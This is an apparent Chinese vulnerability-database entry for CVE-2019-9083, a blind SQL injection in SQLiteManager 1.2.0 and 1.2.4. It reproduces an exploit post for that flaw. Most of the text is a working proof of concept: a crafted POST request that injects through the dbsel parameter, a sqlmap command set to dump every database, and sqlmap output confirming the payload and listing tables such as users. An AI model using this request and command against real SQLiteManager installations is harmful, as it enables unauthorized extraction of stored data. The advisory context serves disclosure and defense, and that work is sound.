SQLiteManager SQL注入漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1510194 漏洞类型 SQL注入
发布时间 2019-02-28 更新时间 2019-08-29
CVE编号 CVE-2019-9083 CNNVD-ID CNNVD-201902-992
漏洞平台 N/A CVSS评分 N/A
SQLiteManager是一套支持多国语言基于Web的SQLite数据库管理工具。 SQLiteManager 1.2.0版本和1.2.4版本中存在SQL注入漏洞。远程攻击者可利用该漏洞执行SQL命令。
# Exploit Title: Blind SQL injection in SQLiteManager 1.2.0 (and 1.2.4)
# Date: 17-02-2019
# Exploit Author: Rafael Pedrero
# Vendor Homepage: http://www.sqlitemanager.org/
# Software Link: http://www.sqlitemanager.org/
# Version: SQLiteManager 1.2.0 (and 1.2.4)
# Tested on: All
# CVE : CVE-2019-9083
# Category: webapps

1. Description

SQLiteManager 1.2.0 (and 1.2.4) allows SQL injection via the
/sqlitemanager/main.php dbsel parameter. NOTE: This product is discontinued.

2. Proof of Concept


Save the next post in a file: sqli.txt

POST /sqlite/main.php?dbsel=-1%20or%2032%20%3d%2030 HTTP/1.1
Content-Length: 191
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Cookie: PHPSESSID=s5uogfet0s4nhr81ihgmg5l4v3;
SQLiteManager_currentTheme=default; SQLiteManager_currentLangue=8;
SQLiteManager_fullText=0; SQLiteManager_HTMLon=0
Host: localhost
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64;


$ python sqlmap.py -r sqli.txt -p dbsel --level 5 --risk 3 --dump-all

[11:58:27] [INFO] resuming back-end DBMS 'sqlite'
[11:58:27] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
Parameter: dbsel (GET)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause
    Payload: dbsel=-4019 OR 7689=7689
[11:58:27] [INFO] the back-end DBMS is SQLite
web server operating system: Windows
web application technology: PHP X.X.X, Apache 2.X.X
back-end DBMS: SQLite
[11:58:27] [INFO] sqlmap will dump entries of all tables from all databases
[11:58:27] [INFO] fetching tables for database: 'SQLite_masterdb'
[11:58:27] [INFO] fetching number of tables for database 'SQLite_masterdb'
[11:58:27] [WARNING] reflective value(s) found and filtering out
[11:58:27] [WARNING] running in a single-thread mode. Please consider usage
of o
ption '--threads' for faster data retrieval
[11:58:27] [INFO] retrieved: 5
[11:58:27] [INFO] retrieved: database
[11:58:28] [INFO] retrieved: user_function
[11:58:30] [INFO] retrieved: attachment
[11:58:31] [INFO] retrieved: groupes
[11:58:32] [INFO] retrieved: users

3. Solution:

The product is discontinued. Update to last version.